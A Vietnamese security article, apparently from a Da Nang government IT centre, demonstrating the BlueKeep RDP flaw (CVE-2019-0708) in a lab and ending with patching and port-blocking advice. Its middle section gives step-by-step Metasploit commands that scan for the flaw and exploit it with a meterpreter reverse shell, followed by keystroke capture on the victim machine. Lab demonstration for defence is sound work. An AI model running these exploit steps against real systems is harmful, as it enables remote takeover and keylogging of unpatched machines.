Thực nghiệm lỗ hổng BLUEKEEP (CVE-2019-0708)
Ngày đăng: 11/01/2020
BlueKeep là một lỗ hổng thực thi mã từ xa trong Dịch vụ kết nối Máy tính từ xa của Windows (Windows Remote Desktop Services). Lỗ hổng BlueKeep có định danh CVE-2019-0708, được đánh giá mức độ nghiêm trọng. Vào ngày 14/05/2019 Microsoft đã phát hành bản cập nhật cho lỗ hổng có mã CVE-2019-0708 tồn tại trong dịch vụ Remote Desktop. Đáng lo ngại, tin tặc có thể sử dụng lỗ hổng như một phương thức để phát tán mã độc đào tiền ảo, trojan ngân hàng hoặc các loại mã độc khác, mà không cần sự tương tác của người dùng.

1.     Giới thiệu:

BlueKeep là một lỗ hổng thực thi mã từ xa trong Dịch vụ kết nối Máy tính từ xa của Windows (Windows Remote Desktop Services). Lỗ hổng BlueKeep có định danh CVE-2019-0708, được đánh giá mức độ nghiêm trọng. Vào ngày 14/05/2019 Microsoft đã phát hành bản cập nhật cho lỗ hổng có mã CVE-2019-0708 tồn tại trong dịch vụ Remote Desktop. Đáng lo ngại, tin tặc có thể sử dụng lỗ hổng như một phương thức để phát tán mã độc đào tiền ảo, trojan ngân hàng hoặc các loại mã độc khác, mà không cần sự tương tác của người dùng.

2.     Các phiên bản ảnh hưởng:

-         Windows 2003

-         Windows XP

-         Windows 7

-         Windows Server 2008

-         Windows Server 2008 R2

3.     Cách kiểm tra và thực nghiệm


Tool sử dụng: Metasploit, TCPView

      Cài đặt và cập nhập metasploit mới nhất:

       apt update; apt install metasploit-framework

Kiểm tra

Hình 1 – Scan lỗ hổng bluekeep

Step 1: Khởi động msfconsole

Step 2: search bluekeep

Step 3: use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

Step 4: set rhosts 192.168.8.129

Step 5: run

Thực nghiệm

Hình 2 – Thêm option cần thiết cho payload

Step 1: use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Step 2: set payload windows/x64/meterpreter/reverse_tcp

Step 3: set lhost 192.168.8.128

Step 4: set rhosts 192.168.8.129

Step 5: set target 1

Step 6: set groomsize 50

Step 7: exploit

 

Hình 3 – Kết quả khai thác


Hình 4 – Kịch bản khai thác keyscan trên máy nạn nhân

4.     Cách khắc phục

-         Sử dụng tool TCPView kiểm tra kết nối, phát hiện process có kết nối lạ đến, kill tiến trình đó.


-         Tạm thời chặn port 3389, nếu sử dụng thì giới hạn ip vào port.

-         Cập nhập bản vá tương ứng với hệ điều hành

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

 

Tin liên quan

Trang 1 / 11 - 110 dòngFirstPrevNextLast v
Trang 1 / 11 - 110 dòngFirstPrevNextLast v

Các đơn vị đối tác

TRUNG TÂM PHÁT TRIỂN HẠ TẦNG CÔNG NGHỆ THÔNG TIN ĐÀ NẴNG

Giấy phép: Số 151/GP-TTĐT do Sở Thông tin và Truyền thông cấp ngày 15/4/2015.

Trưởng Ban biên tập: Nguyễn Thị Huyền Thu, Phó giám đốc Trung tâm Phát triển hạ tầng Công nghệ thông tin Đà Nẵng.

Trụ sở: Tòa nhà 02 Quang Trung, Phường Thạch Thang, Quận Hải Châu, Tp Đà Nẵng.

Điện thoại: 84.236.3888.666 Fax 84.236.3888.879 Email: iid@danang.gov.vn.